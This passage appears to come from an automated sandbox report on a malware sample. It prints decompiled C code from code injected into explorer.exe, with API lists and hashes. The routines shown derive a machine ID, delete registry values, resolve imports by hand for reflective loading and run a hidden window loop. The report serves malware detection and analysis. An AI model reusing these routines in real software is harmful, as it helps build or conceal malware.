									_t90 = E000C553F(_t153, _t130, __eflags);
									L26:
									__eflags = _t90;
									if(_t90 >= 0) {
										_t91 =  *0xde688; // 0xf0000
										goto L32;
									}
									_push(0xfffffffd);
									L6:
									_pop(_t192);
									goto L41;
								}
							}
							_t106 = E000CC292(_v1104, __eflags);
							_v1112 = _t106;
							_t107 =  *0xde684; // 0x64f8f0
							_t108 =  *((intOrPtr*)(_t107 + 0xd0))(_t106, 0x80003, 6, 0xff, 0x400, 0x400, 0, 0);
							__eflags = _t108 - _t192;
							if(_t108 != _t192) {
								_t109 =  *0xde684; // 0x64f8f0
								 *((intOrPtr*)(_t109 + 0x30))();
								E000C861A( &_v1148, _t192);
								_t145 = _t108;
								goto L17;
							}
							E000C861A( &_v1144, _t192);
							_t81 = 1;
							goto L42;
						}
						_t116 =  *(_t75 + 0x1898);
						__eflags = _t116 & 0x00000004;
						if((_t116 & 0x00000004) == 0) {
							__eflags = _t116;
							if(_t116 != 0) {
								goto L12;
							}
							L11:
							E000CE286(_v1112, _t175);
							goto L12;
						}
						_v1080 = _v1080 & 0x00000000;
						_t118 = E000C95E1(_t143, 0x879);
						_v1100 = _t118;
						_t175 = _t118;
						E000CBFEC(0x80000002, _t118, _v1112, 4,  &_v1080, 4);
						E000C85D5( &_v1100);
						_t200 = _t200 + 0x14;
						goto L11;
					}
					_push(0xfffffffe);
					goto L6;
				} else {
					_t122 = E000C2BA4( &_v1044, _t192, 0x105); // executed
					_t206 = _t122;
					if(_t122 == 0) {
						L41:
						_t81 = _t192;
						L42:
						return _t81;
					}
					goto L4;
				}
			}
































































        0x000c4a0b
        0x000c4a18
        0x000c4a23
        0x000c4a28
        0x000c4a2a
        0x000c4a2d
        0x000c4a32
        0x000c4a35
        0x000c4a3f
        0x000c4a41
        0x000c4a4e
        0x000c4a57
        0x000c4a57
        0x000c4a64
        0x000c4a7f
        0x000c4a86
        0x000c4a88
        0x000c4a8d
        0x000c4a92
        0x000c4a98
        0x000c4aa7
        0x000c4ac6
        0x000c4ac8
        0x000c4ace
        0x000c4ad4
        0x000c4ad9
        0x000c4add
        0x000c4ae0
        0x000c4aea
        0x000c4aec
        0x000c4aed
        0x000c4af8
        0x000c4afa
        0x000c4afd
        0x000c4b02
        0x000c4b09
        0x000c4b5e
        0x000c4b5e
        0x000c4b63
        0x000c4bca
        0x000c4bcf
        0x000c4bd1
        0x000c4bdb
        0x000c4be0
        0x000c4be0
        0x000c4bf5
        0x000c4bfa
        0x000c4bfc
        0x000c4bff
        0x000c4c01
        0x00000000
        0x00000000
        0x000c4c07
        0x000c4c11
        0x000c4c1a
        0x000c4c1f
        0x000c4c22
        0x000c4c28
        0x000c4c2e
        0x000c4c36
        0x000c4c38
        0x000c4c3b
        0x000c4c3c
        0x000c4c41
        0x000c4c44
        0x000c4c47
        0x000c4c49
        0x000c4c4d
        0x000c4c4d
        0x000c4c52
        0x000c4c55
        0x000c4c57
        0x000c4c5b
        0x000c4c5b
        0x000c4c62
        0x000c4c67
        0x000c4c69
        0x000c4c6d
        0x000c4c6f
        0x000c4c75
        0x000c4c79
        0x000c4c7c
        0x000c4c7d
        0x000c4c82
        0x000c4c85
        0x000c4c8a
        0x000c4cb2
        0x000c4cb8
        0x000c4cbf
        0x000c4cce
        0x000c4cd3
        0x00000000
        0x000c4cd3
        0x000c4cc1
        0x00000000
        0x000c4c8c
        0x000c4c8c
        0x000c4c91
        0x000c4c98
        0x000c4cdd
        0x000c4cdd
        0x000c4ce4
        0x000c4ce8
        0x000c4ce9
        0x000c4ce9
        0x000c4cf3
        0x000c4cf8
        0x000c4cfb
        0x000c4cfc
        0x000c4cfe
        0x000c4d00
        0x000c4d05
        0x000c4d0c
        0x000c4d4f
        0x000c4d0e
        0x000c4d13
        0x000c4d1b
        0x000c4d1f
        0x000c4d2a
        0x000c4d35
        0x000c4d3d
        0x000c4d41
        0x000c4d49
        0x000c4d49
        0x000c4d0c
        0x000c4d55
        0x000c4d58
        0x000c4d5a
        0x000c4d60
        0x000c4d60
        0x000c4d62
        0x000c4d62
        0x00000000
        0x000c4d62
        0x000c4c9a
        0x000c4c9a
        0x000c4ca0
        0x000c4ca2
        0x000c4ca7
        0x000c4ca7
        0x000c4ca9
        0x000c4cd8
        0x00000000
        0x000c4cd8
        0x000c4cab
        0x000c4ae4
        0x000c4ae4
        0x00000000
        0x000c4ae4
        0x000c4c8a
        0x000c4b69
        0x000c4b77
        0x000c4b8a
        0x000c4b8f
        0x000c4b95
        0x000c4b97
        0x000c4baf
        0x000c4bb4
        0x000c4bbd
        0x000c4bc3
        0x00000000
        0x000c4bc3
        0x000c4b9f
        0x000c4ba8
        0x00000000
        0x000c4ba8
        0x000c4b0b
        0x000c4b11
        0x000c4b13
        0x000c4b51
        0x000c4b53
        0x00000000
        0x00000000
        0x000c4b55
        0x000c4b59
        0x00000000
        0x000c4b59
        0x000c4b15
        0x000c4b1f
        0x000c4b2b
        0x000c4b36
        0x000c4b3d
        0x000c4b47
        0x000c4b4c
        0x00000000
        0x000c4b4c
        0x000c4ae2
        0x00000000
        0x000c4a66
        0x000c4a71
        0x000c4a77
        0x000c4a79
        0x000c4d64
        0x000c4d64
        0x000c4d66
        0x000c4d6c
        0x000c4d6c
        0x00000000
        0x000c4a79

        APIs
        Memory Dump Source
        • Source File: 00000006.00000002.894836786.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_6_2_c0000_explorer.jbxd
        Similarity
        • API ID: lstrcat$lstrcpy$memset
        • String ID:
        • API String ID: 1985475764-0
        • Opcode ID: bbb91f8f85fc09bd0cb59870f16fccdce3466dba909f4f420023db500a225448
        • Instruction ID: e00079e0afd43232e147177fe6b1363a575de2813d944f784ff1f94eb2fb20e0
        • Opcode Fuzzy Hash: bbb91f8f85fc09bd0cb59870f16fccdce3466dba909f4f420023db500a225448
        • Instruction Fuzzy Hash: BE91AC71604300AFE754EB20D896FBE73E9BB84720F14492EF9558B2D2EB74DD048B52
        Uniqueness

        Uniqueness Score: -1.00%

        Function 000CB7A8, Relevance: 9.1, APIs: 6, Instructions: 83stringCOMMON
        Download Yara Rule

        Control-flow Graph

        C-Code - Quality: 94%
        			E000CB7A8(WCHAR* __ecx, void* __edx) {
				long _v8;
				long _v12;
				WCHAR* _v16;
				short _v528;
				short _v1040;
				short _v1552;
				WCHAR* _t27;
				signed int _t29;
				void* _t33;
				long _t38;
				WCHAR* _t43;
				WCHAR* _t56;

				_t44 = __ecx;
				_v8 = _v8 & 0x00000000;
				_t43 = __edx;
				_t56 = __ecx;
				memset(__edx, 0, 0x100);
				_v12 = 0x100;
				GetComputerNameW( &_v528,  &_v12);
				lstrcpynW(_t43,  &_v528, 0x100);
				_t27 = E000C95E1(_t44, 0xa88);
				_v16 = _t27;
				_t29 = GetVolumeInformationW(_t27,  &_v1552, 0x100,  &_v8, 0, 0,  &_v1040, 0x100);
				asm("sbb eax, eax");
				_v8 = _v8 &  ~_t29;
				E000C85D5( &_v16);
				_t33 = E000CC392(_t43);
				E000C9640( &(_t43[E000CC392(_t43)]), 0x100 - _t33, L"%u", _v8);
				lstrcatW(_t43, _t56);
				_t38 = E000CC392(_t43);
				_v12 = _t38;
				CharUpperBuffW(_t43, _t38);
				return E000CD400(_t43, E000CC392(_t43) + _t40, 0);
			}















        0x000cb7a8
        0x000cb7b1
        0x000cb7bd
        0x000cb7c3
        0x000cb7c5
        0x000cb7cd
        0x000cb7e0
        0x000cb7ef
        0x000cb7fa
        0x000cb807
        0x000cb821
        0x000cb826
        0x000cb828
        0x000cb82f
        0x000cb83f
        0x000cb850
        0x000cb85a
        0x000cb862
        0x000cb869
        0x000cb86c
        0x000cb889

        APIs
        • memset.MSVCRT ref: 000CB7C5
        • GetComputerNameW.KERNEL32(?,?,74EC17D9,00000000,74EC11C0), ref: 000CB7E0
        • lstrcpynW.KERNEL32(?,?,00000100), ref: 000CB7EF
        • GetVolumeInformationW.KERNELBASE(00000000,?,00000100,00000000,00000000,00000000,?,00000100), ref: 000CB821
          • Part of subcall function 000C9640: _vsnwprintf.MSVCRT ref: 000C965D
        • lstrcatW.KERNEL32 ref: 000CB85A
        • CharUpperBuffW.USER32(?,00000000), ref: 000CB86C
        Memory Dump Source
        • Source File: 00000006.00000002.894836786.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_6_2_c0000_explorer.jbxd
        Similarity
        • API ID: BuffCharComputerInformationNameUpperVolume_vsnwprintflstrcatlstrcpynmemset
        • String ID:
        • API String ID: 3410906232-0
        • Opcode ID: dfc5864c2b90876376009b67c939ce655e3198ce6944b79d75ab05716b14c094
        • Instruction ID: 2790561c89e92655b6e37f14f7a47cad77b00b55e4e119700a331dcc1739aec8
        • Opcode Fuzzy Hash: dfc5864c2b90876376009b67c939ce655e3198ce6944b79d75ab05716b14c094
        • Instruction Fuzzy Hash: 302156B2901218BFE714ABA4DC8AFEE77BCDF54310F10856AF505D6182EE75AF048B64
        Uniqueness

        Uniqueness Score: -1.00%

        Function 000C61B4, Relevance: 7.6, APIs: 5, Instructions: 145registryCOMMON
        Download Yara Rule

        Control-flow Graph

        • Executed
        • Not Executed
        control_flow_graph 123 c61b4-c61f9 memset call c8604 126 c61ff-c6211 call c8604 123->126 127 c6363-c6369 123->127 126->127 130 c6217-c6234 RegOpenKeyExW 126->130 131 c623a-c626d 130->131 132 c6333-c6337 130->132 137 c627f-c6284 131->137 138 c626f-c627a 131->138 133 c6339-c6341 RegCloseKey 132->133 134 c6344-c6360 call c861a * 2 132->134 133->134 134->127 137->132 140 c628a 137->140 138->132 144 c628d-c62dc memset * 2 140->144 146 c62de-c62ee 144->146 147 c6326-c632d 144->147 149 c62f0-c6304 146->149 150 c6323 146->150 147->132 147->144 149->150 152 c6306-c6313 call cc392 149->152 150->147 155 c631c-c631e call cb1b1 152->155 156 c6315-c6317 152->156 155->150 156->155
        C-Code - Quality: 80%
        			E000C61B4(void* __edx, void* __fp0, void* _a4, short* _a8, intOrPtr _a12, intOrPtr _a16) {
				void* _v8;
				int _v12;
				int _v16;
				int _v20;
				char _v24;
				char _v28;
				void* _v32;
				void* _v36;
				char _v40;
				char _v44;
				char _v48;
				char _v56;
				void _v576;
				void* _t53;
				intOrPtr _t72;
				intOrPtr _t80;
				intOrPtr _t81;
				intOrPtr _t82;
				signed int _t85;
				intOrPtr _t87;
				int _t89;
				intOrPtr _t90;
				intOrPtr _t92;
				void* _t96;
				void* _t97;
				void* _t98;
				void* _t99;
				void* _t100;
				void* _t108;

				_t108 = __fp0;
				_t96 = __edx;
				_t89 = 0;
				_v8 = 0;
				memset( &_v576, 0, 0x208);
				_v28 = 0x104;
				_v20 = 0x3fff;
				_v16 = 0;
				_t53 = E000C8604(0x3fff); // executed
				_t98 = _t53;
				_t100 = _t99 + 0x10;
				_v32 = _t98;
				if(_t98 == 0) {
					L18:
					return 0;
				}
				_t97 = E000C8604(0x800);
				_v36 = _t97;
				if(_t97 == 0) {
					goto L18;
				}
				if(RegOpenKeyExW(_a4, _a8, 0, 0x2001f,  &_v8) != 0) {
					L15:
					if(_v8 != 0) {
						RegCloseKey(_v8);
					}
					E000C861A( &_v32, 0x3fff);
					E000C861A( &_v36, 0x800);
					goto L18;
				}
				_push( &_v56);
				_push( &_v40);
				_push( &_v44);
				_push( &_v48);
				_push( &_v24);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push( &_v28);
				_push( &_v576);
				_t72 =  *0xde68c; // 0x64fab8
				_push(_v8);
				if( *((intOrPtr*)(_t72 + 0xb0))() == 0) {
					__eflags = _v24;
					if(_v24 == 0) {
						goto L15;
					}
					_v12 = 0;
					do {
						memset(_t97, 0, 0x800);
						memset(_t98, 0, 0x3fff);
						_t100 = _t100 + 0x18;
						_v20 = 0x3fff;
						_v16 = 0x800;
						 *_t98 = 0;
						_t80 =  *0xde68c; // 0x64fab8
						_t81 =  *((intOrPtr*)(_t80 + 0xc8))(_v8, _t89, _t98,  &_v20, 0, 0, _t97,  &_v16);
						__eflags = _t81;
						if(_t81 == 0) {
							_t82 =  *0xde690; // 0x64fb90
							_t90 =  *((intOrPtr*)(_t82 + 4))(_t97, _a12);
							__eflags = _t90;
							if(_t90 != 0) {
								_t92 =  *0xde68c; // 0x64fab8
								 *((intOrPtr*)(_t92 + 0xa8))(_v8, _t98);
								__eflags = _a16;
								if(_a16 != 0) {
									_t85 = E000CC392(_t90);
									__eflags =  *((short*)(_t90 + _t85 * 2 - 2)) - 0x22;
									if(__eflags == 0) {
										__eflags = 0;
										 *((short*)(_t90 + _t85 * 2 - 2)) = 0;
									}
									E000CB1B1(_t90, _t96, __eflags, _t108);
								}
							}
							_t89 = _v12;
						}
						_t89 = _t89 + 1;
						_v12 = _t89;
						__eflags = _t89 - _v24;
					} while (_t89 < _v24);
					goto L15;
				}
				_t87 =  *0xde68c; // 0x64fab8
				 *((intOrPtr*)(_t87 + 0x1c))(_v8);
				goto L15;
			}
































        0x000c61b4
        0x000c61b4
        0x000c61c0
        0x000c61cf
        0x000c61d2
        0x000c61dc
        0x000c61e4
        0x000c61e7
        0x000c61ea
        0x000c61ef
        0x000c61f1
        0x000c61f4
        0x000c61f9
        0x000c6365
        0x000c6369
        0x000c6369
        0x000c6209
        0x000c620b
        0x000c6211
        0x00000000
        0x00000000
        0x000c6234
        0x000c6333
        0x000c6337
        0x000c6341
        0x000c6341
        0x000c634d
        0x000c635b
        0x00000000
        0x000c6360
        0x000c623d
        0x000c6241
        0x000c6245
        0x000c6249
        0x000c624d
        0x000c624e
        0x000c624f
        0x000c6250
        0x000c6251
        0x000c6255
        0x000c625c
        0x000c625d
        0x000c6262
        0x000c626d
        0x000c6282
        0x000c6284
        0x00000000
        0x00000000
        0x000c628a
        0x000c628d
        0x000c6295
        0x000c62a2
        0x000c62a7
        0x000c62aa
        0x000c62b3
        0x000c62ba
        0x000c62ca
        0x000c62d4
        0x000c62da
        0x000c62dc
        0x000c62e1
        0x000c62ea
        0x000c62ec
        0x000c62ee
        0x000c62f0
        0x000c62fa
        0x000c6300
        0x000c6304
        0x000c6308
        0x000c630d
        0x000c6313
        0x000c6315
        0x000c6317
        0x000c6317
        0x000c631e
        0x000c631e
        0x000c6304
        0x000c6323
        0x000c6323
        0x000c6326
        0x000c6327
        0x000c632a
        0x000c632a
        0x00000000
        0x000c628d
        0x000c626f
        0x000c6277
        0x00000000

        APIs
        • memset.MSVCRT ref: 000C61D2
          • Part of subcall function 000C8604: RtlAllocateHeap.NTDLL(00000008,?,?,000C8F84,00000100,?,000C5FCB), ref: 000C8612
        • RegOpenKeyExW.KERNEL32(?,?,00000000,0002001F,?,?,?,00000001), ref: 000C622C
        • memset.MSVCRT ref: 000C6295
        • memset.MSVCRT ref: 000C62A2
        • RegCloseKey.KERNEL32(00000000,?,?,00000001), ref: 000C6341
        Memory Dump Source
        • Source File: 00000006.00000002.894836786.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_6_2_c0000_explorer.jbxd
        Similarity
        • API ID: memset$AllocateCloseHeapOpen
        • String ID:
        • API String ID: 1886988140-0
        • Opcode ID: f6fa1eac9dcb17a81bba8c4404ec287a86c2780e00c12e61b3c54107ad2da9c9
        • Instruction ID: f078e681015c4581afc2321a8b200155c778797c9d6990bad354d136111ed3bb
        • Opcode Fuzzy Hash: f6fa1eac9dcb17a81bba8c4404ec287a86c2780e00c12e61b3c54107ad2da9c9
        • Instruction Fuzzy Hash: 33510EB1A00249AFEB61DF94CC85FEE7BBCEF04740F10806AF605AB152DB759A058B65
        Uniqueness

        Uniqueness Score: -1.00%

        Function 000CCF84, Relevance: 7.5, APIs: 5, Instructions: 43COMMON
        Download Yara Rule

        Control-flow Graph

        C-Code - Quality: 94%
        			E000CCF84(void* __ecx) {
				intOrPtr _t11;
				long _t12;
				intOrPtr _t17;
				intOrPtr _t18;
				struct _OSVERSIONINFOA* _t29;

				_push(__ecx);
				_t29 =  *0xde688; // 0xf0000
				GetCurrentProcess();
				_t11 = E000CBA05(); // executed
				_t1 = _t29 + 0x1644; // 0xf1644
				_t25 = _t1;
				 *((intOrPtr*)(_t29 + 0x110)) = _t11;
				_t12 = GetModuleFileNameW(0, _t1, 0x105);
				_t33 = _t12;
				if(_t12 != 0) {
					_t12 = E000C8FBE(_t25, _t33);
				}
				_t3 = _t29 + 0x228; // 0xf0228
				 *(_t29 + 0x1854) = _t12;
				 *((intOrPtr*)(_t29 + 0x434)) = E000C8FBE(_t3, _t33);
				memset(_t29, 0, 0x9c);
				_t29->dwOSVersionInfoSize = 0x9c;
				GetVersionExA(_t29);
				 *((intOrPtr*)(_t29 + 0x1640)) = GetCurrentProcessId();
				_t17 = E000CE3B6(_t3);
				_t7 = _t29 + 0x220; // 0xf0220
				 *((intOrPtr*)(_t29 + 0x21c)) = _t17;
				_t18 = E000CE3F1(_t7); // executed
				 *((intOrPtr*)(_t29 + 0x218)) = _t18;
				return _t18;
			}








        0x000ccf87
        0x000ccf89
        0x000ccf90
        0x000ccf98
        0x000ccfa2
        0x000ccfa2
        0x000ccfa8
        0x000ccfb1
        0x000ccfb7
        0x000ccfb9
        0x000ccfbd
        0x000ccfbd
        0x000ccfc2
        0x000ccfc8
        0x000ccfd8
        0x000ccfe2
        0x000ccfea
        0x000ccfed
        0x000ccff9
        0x000ccfff
        0x000cd004
        0x000cd00a
        0x000cd010
        0x000cd016
        0x000cd01e

        APIs
        • GetCurrentProcess.KERNEL32(?,?,000F0000,?,000C3545), ref: 000CCF90
        • GetModuleFileNameW.KERNEL32(00000000,000F1644,00000105,?,?,000F0000,?,000C3545), ref: 000CCFB1
        • memset.MSVCRT ref: 000CCFE2
        • GetVersionExA.KERNEL32(000F0000,000F0000,?,000C3545), ref: 000CCFED
        • GetCurrentProcessId.KERNEL32(?,000C3545), ref: 000CCFF3
        Memory Dump Source
        • Source File: 00000006.00000002.894836786.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_6_2_c0000_explorer.jbxd
        Similarity
        • API ID: CurrentProcess$FileModuleNameVersionmemset
        • String ID:
        • API String ID: 3581039275-0
        • Opcode ID: ce077deba676a9e204692a8621cf94e2ae9e6113a021fd017ecb45372178f67c
        • Instruction ID: 85beb0dd8ed8ae9ed765903e2ec244192ab05f814248cde92d819e8ab3455d73
        • Opcode Fuzzy Hash: ce077deba676a9e204692a8621cf94e2ae9e6113a021fd017ecb45372178f67c
        • Instruction Fuzzy Hash: B6019E709027009BE720AF71D84AFEABBE5EF80300F00082EF85683282EF746505CB64
        Uniqueness

        Uniqueness Score: -1.00%

        Function 000D249B, Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 151libraryCOMMON
        Download Yara Rule

        Control-flow Graph

        • Executed
        • Not Executed
        control_flow_graph 170 d249b-d24a9 171 d24ab-d24ae 170->171 172 d24b3-d24f3 GetModuleHandleA call ce099 170->172 173 d2660-d2661 171->173 176 d265e 172->176 177 d24f9-d2510 172->177 176->173 178 d2513-d251a 177->178 179 d251c-d2525 178->179 180 d2527-d2537 178->180 179->178 181 d253a-d2541 180->181 181->176 182 d2547-d255e LoadLibraryA 181->182 183 d2568-d256e 182->183 184 d2560-d2563 182->184 185 d257d-d2586 183->185 186 d2570-d257b 183->186 184->173 187 d2589 185->187 186->187 188 d258d-d2593 187->188 189 d2599-d25b1 188->189 190 d2650-d2659 188->190 191 d25d4-d2602 189->191 192 d25b3-d25d2 189->192 190->181 195 d2605-d260b 191->195 192->195 196 d260d-d261b 195->196 197 d2639-d264b 195->197 198 d261d-d262f 196->198 199 d2631-d2637 196->199 197->188 198->197 199->197
        C-Code - Quality: 50%
        			E000D249B(signed int __eax, intOrPtr _a4) {
				intOrPtr* _v8;
				signed int* _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				intOrPtr _v32;
				struct HINSTANCE__* _v36;
				intOrPtr _v40;
				signed int _v44;
				struct HINSTANCE__* _v48;
				intOrPtr _v52;
				signed int _v56;
				intOrPtr _v60;
				signed int _v64;
				signed int _t109;
				signed int _t112;
				signed int _t115;
				struct HINSTANCE__* _t121;
				void* _t163;

				_v44 = _v44 & 0x00000000;
				if(_a4 != 0) {
					_v48 = GetModuleHandleA("kernel32.dll");
					_v40 = E000CE099(_v48, "GetProcAddress");
					_v52 =  *((intOrPtr*)(_a4 + 0x3c)) + _a4;
					_v32 = _v52;
					_t109 = 8;
					if( *((intOrPtr*)(_v32 + (_t109 << 0) + 0x78)) == 0) {
						L24:
						return 0;
					}
					_v56 = 0x80000000;
					_t112 = 8;
					_v8 = _a4 +  *((intOrPtr*)(_v32 + (_t112 << 0) + 0x78));
					while( *((intOrPtr*)(_v8 + 0xc)) != 0) {
						_v8 = _v8 + 0x14;
					}
					_t115 = 8;
					_v8 = _a4 +  *((intOrPtr*)(_v32 + (_t115 << 0) + 0x78));
					while( *((intOrPtr*)(_v8 + 0xc)) != 0) {
						_t121 = LoadLibraryA( *((intOrPtr*)(_v8 + 0xc)) + _a4); // executed
						_v36 = _t121;
						if(_v36 != 0) {
							if( *_v8 == 0) {
								_v12 =  *((intOrPtr*)(_v8 + 0x10)) + _a4;
							} else {
								_v12 =  *_v8 + _a4;
							}
							_v28 = _v28 & 0x00000000;
							while( *_v12 != 0) {
								_v24 = _v24 & 0x00000000;
								_v16 = _v16 & 0x00000000;
								_v64 = _v64 & 0x00000000;
								_v20 = _v20 & 0x00000000;
								if(( *_v12 & _v56) == 0) {
									_v60 =  *_v12 + _a4;
									_v20 = _v60 + 2;
									_v24 =  *( *((intOrPtr*)(_v8 + 0x10)) + _a4 + _v28);
									_v16 = _v40(_v36, _v20);
								} else {
									_v24 =  *_v12;
									_v20 = _v24 & 0x0000ffff;
									_v16 = _v40(_v36, _v20);
								}
								if(_v24 != _v16) {
									_v44 = _v44 + 1;
									if( *((intOrPtr*)(_v8 + 0x10)) == 0) {
										 *_v12 = _v16;
									} else {
										 *( *((intOrPtr*)(_v8 + 0x10)) + _a4 + _v28) = _v16;
									}
								}
								_v12 =  &(_v12[1]);
								_v28 = _v28 + 4;
							}
							_v8 = _v8 + 0x14;
							continue;
						}
						_t163 = 0xfffffffd;
						return _t163;
					}
					goto L24;
				}
				return __eax | 0xffffffff;
			}























        0x000d24a1
        0x000d24a9
        0x000d24be
        0x000d24d0
        0x000d24dc
        0x000d24e2
        0x000d24e7
        0x000d24f3
        0x000d265e
        0x00000000
        0x000d265e
        0x000d24f9
        0x000d2502
        0x000d2510
        0x000d2513
        0x000d2522
        0x000d2522
        0x000d2529
        0x000d2537
        0x000d253a
        0x000d2551
        0x000d2557
        0x000d255e
        0x000d256e
        0x000d2586
        0x000d2570
        0x000d2578
        0x000d2578
        0x000d2589
        0x000d258d
        0x000d2599
        0x000d259d
        0x000d25a1
        0x000d25a5
        0x000d25b1
        0x000d25dc
        0x000d25e4
        0x000d25f6
        0x000d2602
        0x000d25b3
        0x000d25b8
        0x000d25c3
        0x000d25cf
        0x000d25cf
        0x000d260b
        0x000d2611
        0x000d261b
        0x000d2637
        0x000d261d
        0x000d262c
        0x000d262c
        0x000d261b
        0x000d263f
        0x000d2648
        0x000d2648
        0x000d2656
        0x00000000
        0x000d2656
        0x000d2562
        0x00000000
        0x000d2562
        0x00000000
        0x000d253a
        0x00000000

        APIs
        • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 000D24B8
        • LoadLibraryA.KERNEL32(00000000), ref: 000D2551
        Strings
        Memory Dump Source
        • Source File: 00000006.00000002.894836786.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_6_2_c0000_explorer.jbxd
        Similarity
        • API ID: HandleLibraryLoadModule
        • String ID: GetProcAddress$kernel32.dll
        • API String ID: 4133054770-1584408056
        • Opcode ID: 5b73e45b0ccaba85451fd15043d652342e788a2a1f747586dafaf4a79dd21d9c
        • Instruction ID: deaac39a8f92dcb34ee975fe36824c3fd640916c06a8e948343ef26f76a1822f
        • Opcode Fuzzy Hash: 5b73e45b0ccaba85451fd15043d652342e788a2a1f747586dafaf4a79dd21d9c
        • Instruction Fuzzy Hash: BB619C75900209EFDB50CF98D885BADBBF1FF08315F24859AE815AB391C774AA80DF60
        Uniqueness

        Uniqueness Score: -1.00%

        Function 000C2EDA, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 99COMMON
        Download Yara Rule

        Control-flow Graph

        • Executed
        • Not Executed
        control_flow_graph 200 c2eda-c2f50 memset call c902d 205 c2fcd-c2fd4 200->205 206 c2f52-c2f81 CreateWindowExA 200->206 207 c2fdf-c2ff4 205->207 208 c2fd6-c2fd7 205->208 206->207 209 c2f83-c2f92 ShowWindow 206->209 208->207 211 c2f9b 209->211 212 c2fba-c2fcb 211->212 212->205 214 c2f9d-c2fa0 212->214 214->205 215 c2fa2-c2fb2 214->215 215->212
        C-Code - Quality: 96%
        			E000C2EDA(void* __eflags) {
				CHAR* _v12;
				struct HINSTANCE__* _v32;
				intOrPtr _v44;
				intOrPtr _v48;
				void _v52;
				char _v80;
				char _v144;
				intOrPtr _t25;
				intOrPtr _t32;
				struct HWND__* _t34;
				intOrPtr _t36;
				intOrPtr _t39;
				struct HWND__* _t44;
				intOrPtr _t47;
				intOrPtr _t50;
				void* _t51;
				intOrPtr _t53;
				intOrPtr _t56;
				intOrPtr _t59;
				struct HINSTANCE__* _t64;

				_t25 =  *0xde684; // 0x64f8f0
				_t64 =  *((intOrPtr*)(_t25 + 0x10))(0);
				memset( &_v52, 0, 0x30);
				_t59 =  *0xde688; // 0xf0000
				E000C902D(1,  &_v144, 0x1e, 0x32, _t59 + 0x648);
				_v48 = 3;
				_v52 = 0x30;
				_v12 =  &_v144;
				_v44 = E000C2E77;
				_push( &_v52);
				_t32 =  *0xde694; // 0x64fa48
				_v32 = _t64;
				if( *((intOrPtr*)(_t32 + 8))() == 0) {
					L6:
					_t34 =  *0xde718; // 0x30340
					if(_t34 != 0) {
						_t39 =  *0xde694; // 0x64fa48
						 *((intOrPtr*)(_t39 + 0x28))(_t34);
					}
					L8:
					_t36 =  *0xde694; // 0x64fa48
					 *((intOrPtr*)(_t36 + 0x2c))( &_v144, _t64);
					return 0;
				}
				_t44 = CreateWindowExA(0,  &_v144,  &_v144, 0xcf0000, 0x80000000, 0x80000000, 0x1f4, 0x64, 0, 0, _t64, 0);
				 *0xde718 = _t44;
				if(_t44 == 0) {
					goto L8;
				}
				ShowWindow(_t44, 0);
				_t47 =  *0xde694; // 0x64fa48
				 *((intOrPtr*)(_t47 + 0x18))( *0xde718);
				while(1) {
					_t50 =  *0xde694; // 0x64fa48
					_t51 =  *((intOrPtr*)(_t50 + 0x1c))( &_v80, 0, 0, 0);
					if(_t51 == 0) {
						goto L6;
					}
					if(_t51 == 0xffffffff) {
						goto L6;
					}
					_t53 =  *0xde694; // 0x64fa48
					 *((intOrPtr*)(_t53 + 0x20))( &_v80);
					_t56 =  *0xde694; // 0x64fa48
					 *((intOrPtr*)(_t56 + 0x24))( &_v80);
				}
				goto L6;
			}























        0x000c2ee3
        0x000c2ef2
        0x000c2ef9
        0x000c2efe
        0x000c2f18
        0x000c2f20
        0x000c2f2d
        0x000c2f34
        0x000c2f3a
        0x000c2f41
        0x000c2f42
        0x000c2f47
        0x000c2f50
        0x000c2fcd
        0x000c2fcd
        0x000c2fd4
        0x000c2fd7
        0x000c2fdc
        0x000c2fdc
        0x000c2fdf
        0x000c2fe7
        0x000c2fec
        0x000c2ff4
        0x000c2ff4
        0x000c2f77
        0x000c2f7a
        0x000c2f81
        0x00000000
        0x00000000
        0x000c2f8a
        0x000c2f8d
        0x000c2f98
        0x000c2fba
        0x000c2fc1
        0x000c2fc6
        0x000c2fcb
        0x00000000
        0x00000000
        0x000c2fa0
        0x00000000
        0x00000000
        0x000c2fa6
        0x000c2fab
        0x000c2fb2
        0x000c2fb7
        0x000c2fb7
        0x00000000

        APIs
        • memset.MSVCRT ref: 000C2EF9
        • CreateWindowExA.USER32(00000000,?,?,00CF0000,80000000,80000000,000001F4,00000064,00000000,00000000,00000000,00000000), ref: 000C2F77
        • ShowWindow.USER32(00000000,00000000), ref: 000C2F8A
        Strings
        Memory Dump Source
        • Source File: 00000006.00000002.894836786.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_6_2_c0000_explorer.jbxd
        Similarity
        • API ID: Window$CreateShowmemset
        • String ID: 0
        • API String ID: 3027179219-4108050209
        • Opcode ID: 6eaffb3ee9b8b2be26461f6bad7f1446fdbb12cf683fc5f7db915b76c7ab6cb2
        • Instruction ID: a9f914c0b4fadeb3d72a178da7fd84f66818822a173e8fe5a0fe974533a9003f
        • Opcode Fuzzy Hash: 6eaffb3ee9b8b2be26461f6bad7f1446fdbb12cf683fc5f7db915b76c7ab6cb2
        • Instruction Fuzzy Hash: ED31F5B1501218AFF750EF68DC89FAA7BBCEB18344F00406AB909DB262D634DD058B71
        Uniqueness

        Uniqueness Score: -1.00%

        Function 000C4D6D, Relevance: 6.4, APIs: 4, Instructions: 432stringCOMMON
        Download Yara Rule

        Control-flow Graph

        • Executed
        • Not Executed
